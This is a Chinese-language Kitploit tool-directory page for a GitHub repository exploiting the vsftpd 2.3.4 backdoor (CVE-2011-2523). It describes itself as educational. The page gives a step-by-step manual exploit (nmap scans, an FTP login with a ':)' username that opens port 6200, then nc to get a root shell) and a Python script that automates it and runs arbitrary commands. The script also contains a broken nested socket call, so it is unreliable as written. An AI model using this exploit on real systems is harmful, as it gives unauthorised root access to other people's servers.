Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
vsftpd-2.3.4---Backdoor-Command-Execution — vsftpd 2.3.4 (CVE-2011-2523) 是一个严重漏洞,可导致获取反向 Root Shell。在本仓库中,我将逐步演示如何利用该漏洞的 PoC,包括手动和自动(Python)方式,仅供教育目的。 | Kitploit
工具/GitHubGitHub/tshaq17
/vsftpd-2.3.4---backdoor-command-execution
Payload生成漏洞分析漏洞利用渗透测试学习与教育远程访问工具
GitHubtshaq17/vsftpd-2.3.4---backdoor-command-execution

vsftpd-2.3.4---Backdoor-Command-Execution

vsftpd 2.3.4 (CVE-2011-2523) 是一个严重漏洞,可导致获取反向 Root Shell。在本仓库中,我将逐步演示如何利用该漏洞的 PoC,包括手动和自动(Python)方式,仅供教育目的。

查看仓库
6个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

vsftpd-2.3.4---后门命令执行

vsftpd 2.3.4(CVE-2011-2523)是一个严重漏洞,可导致获取 Root Shell。在本仓库中,我将手动和自动(Python)方式逐步演示如何利用该漏洞,仅供教育目的。

该漏洞是什么? 首先,这是一个服务端漏洞,因此我们可以远程利用它。其原理是:当使用包含 :) 的用户名连接默认端口 21 上的 FTP 服务时,系统会被触发打开一个 TCP 端口 6200,并提供一个 Root Shell,这样任何人都可以连接并获取目标服务器的 Root 访问权限,这简直是灾难。那么让我们一步步实际操作。我会先手动解释以让你全面了解,然后提供一个 Python 脚本来自动利用。

手动利用

端口扫描

  1. 端口 21 开放
root@kitploit:~
nmap -p21 -sV -sC -O 目标IP
image
  1. 端口 6200 关闭
root@kitploit:~
nmap -p6200 目标IP
  • 端口 6200 目前是关闭的 image

漏洞利用

  1. 连接 FTP 服务并使用恶意用户名触发系统打开端口 6200
root@kitploit:~
ftp 目标IP
  • 用户名: 任意内容:)
  • 密码: 任意内容 image
    1. 在 FTP 连接后检查端口 6200
    root@kitploit:~
    nmap -p6200 目标IP
    

    端口 6200 现在已开放,这就是我们的后门

    image
    1. 连接到端口 6200 以获取整个服务器的 Root Shell
    root@kitploit:~
    nc -nv 目标IP 6200
    

    最终,我们在目标机器上获取了一个 Root Shell。 image


    自动利用

    在手动操作之后,我们知道了利用步骤:

    1. 连接到 FTP 服务器(端口 21)。
    2. 使用包含 :) 的用户名触发后门。
    3. 连接到端口 6200。
    root@kitploit:~
    #!/usr/bin/python3 
    
    from ftplib import FTP
    import socket
    import sys
    import time
    
    目标IP = sys.argv[1]
    cmd = sys.argv[2]
    
    # 步骤1: 连接 FTP
    try:
      ftp = FTP(目标IP,timeout=2)
      ftp.login("user:)","password") # 步骤2: 发送恶意用户名
    except:
      pass
    
    time.sleep(1) # 给服务器一点时间打开端口(6200)
    
    #步骤3: 连接到端口(6200)获取 Root Shell
    shell = socket.socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
    try:
      shell.connect((目标IP,6200))
    except:
      print("Shell 失败")
    
    #执行命令
    shell.send(cmd.encode() + b"\n")
    print(shell.recv(4096).decode())
    
    #最后关闭连接
    shell.close()
    
    下载工具